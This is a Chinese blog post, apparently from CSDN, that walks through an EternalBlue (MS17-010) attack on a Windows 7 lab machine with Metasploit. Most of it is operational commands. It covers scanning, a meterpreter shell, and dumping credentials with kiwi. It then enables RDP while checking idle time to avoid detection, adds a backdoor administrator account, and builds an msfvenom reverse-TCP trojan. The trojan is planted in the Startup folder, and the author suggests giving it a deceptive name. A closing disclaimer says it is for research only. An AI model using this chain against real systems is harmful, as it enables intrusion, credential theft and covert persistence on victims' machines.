kali——勒索病毒metasploit

我先来叙述一下大致流程:

1、使用mfs对 445端口进行攻击获得一系列权限

2、更新mfs版本

3、使用search 17_010对命令进行查看

4、use auxiliary/scanner/smb/smb_ms17_010使用该模块设置靶机set rhosts 靶机ip和设置本机监听端口 set lhost 0-65535

5、options查看配置

6、run运行攻击

本机和靶机在同一网段,可以ping通,靶机关闭防火墙的情况或者开启445端口的情况下进攻

相关基础命令

msfconsole -v  查看版本
msfdb init     初始化数据库
msfconsole    启动msf
use auxiliary/scanner/smb/smb_ms17_010   #在使用该模块的情况下
set rhosts 靶机ip   #设置目标靶机
set threads 50    #设置线程

db_status 
workspace
workspace -h

use auxiliary/scanner/portscan/

 端口扫描

nmap -sP 和 nmap -sn -PE 的区别 :

nmap -sP 和 nmap -sn -PE 都是 nmap 工具中用于网络扫描的参数组合,但它们的行为和目的有所不同。

  1. nmap -sP

nmap -sP 命令执行一个 ping 扫描。它会向目标网络中的每个 IP 地址发送 ICMP echo 请求包,以查看哪些主机是活跃的(即在线)。这个命令不会进行端口扫描,只关注于发现哪些 IP 地址对应的主机是响应 ICMP 请求的。

这个命令是快速且相对无侵入的,因为它不尝试连接到任何端口或执行详细的服务检测。它主要用于快速发现网络中的活跃主机。

  1. nmap -sn -PE

nmap -sn 命令告诉 nmap 只进行主机发现,不进行端口扫描。-sn 参数本身是一个快速的方式来确定哪些主机是活跃的,但它默认使用 ICMP echo 请求和 TCP SYN 包来探测主机。

-PE 参数是 nmap 的一个主机发现技术,它使用 ICMP echo 请求和 TCP ACK 包来探测主机。与 ICMP echo 请求不同,TCP ACK 包通常不会被防火墙过滤,因此使用 -PE 参数可能有助于在更严格的环境中发现活跃主机。

将 -sn 和 -PE 结合使用,nmap -sn -PE 命令会执行一个仅主机发现的扫描,使用 ICMP echo 请求和 TCP ACK 包来探测网络中的活跃主机。

区别

  • nmap -sP 仅使用 ICMP echo 请求来探测主机。
  • nmap -sn -PE 使用 ICMP echo 请求和 TCP ACK 包来探测主机,这可能会提高在某些网络环境中的探测成功率。

 获取权限成功后可以执行哪些 相关命令:

search 17_010    #查看相关命令
meterpreter > shell
chcp 65001  //转换一下编码 要不然会乱码
ipconfig  #查看ip
whoami    #查看当前用户名称

 

screenshot

下载文件的时候不知道为什么报错

下载文件命令

download 靶机文件路径

解决方案:

 

打开摄像头:

webcam_stream

 

因为是虚拟机,可能是驱动或者硬件原因

 密码查看:

meterpreter > load kiwi //加载kiwi模块
Loading extension kiwi...Success.
creds_all  #列举所有凭据
exit   #退出

远程登录:

开启3389端口

meterpreter > run post/windows/manage/enable_rdp  //启用目标主机的3389端口远程桌面
meterpreter > idletime  //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
root@kali:~# rdesktop 靶机ip //使用 rdesktop 命令远程连接桌面

我尝试发现,当我远程登录的时候,靶机会退出,靶机再次登录,我这边就会退出 

meterpreter > shell            #进入命令行
net user kill 123 /add         #新建用户kill 密码123
net  localgroup  administrators kill /add #将用户kill添加到Win7的本地管理员组中,获得管理员权限
net user               #查看用户

shutdown /s /t 0   #命令行关闭win7

//shutdown /s /t 0
//
//Access is denied.(5)
//没有足够的权限

远程木马:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.100.219(攻击机ip) lport=6666(攻击机监听端口) -f exe(生成的文件类型) -o demo6666(生成的文件名) 

这是一个木马程序,我想可不可以设置成开机自启文件?

C:\ProgramData\Microsoft\Windows\Start Menu\Programs>cd /ProgramData/Microsoft/Windows/Start Menu/Programs/Startup  

我先来讲一下我的大致思路哈:

demo6666是我生成的木马文件,在永恒之蓝的漏洞下我可以控制该win7,木马文件是等着别人点击的,就是相当于钓鱼,但是时间太长了,我想让他开机自启,也就是说只要用户下一次开机不管他点不点击都会中木马,然后C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\用来存放开机自启文件,我尝试将木马文件demo6666放到开机自启文件里。

上面的链接是针对所有用户,针对于本用户的可自行百度搜索。

报错:

排查:

先把文件上传到C://看看能不能转移到目录下

upload 本机文件 目标路径

授予权限:

net user    #查看用户
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /grant zhang:F   #zhang是用户名

 复制成功:

copy "demo6666" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"

验证木马放入成功否? 

算成功,也不算,win7开机弹出来——考虑将demo6666换成一个具有欺骗性的文件名

直接点击还出现这个问题:——虚拟机和win7显卡驱动不兼容导致的

我声明一下,该文章仅用于研究漏洞,不允许用于违法犯罪,仅用于传播知识,学习谨慎,违法不负责,如有不当,直接私信,联系必删。

不过win10 和11这个永恒之蓝的漏洞都被补上了。 

我大部分参考的这个文档:http://t.csdnimg.cn/BoYgQ

  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

编程浪漫史

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值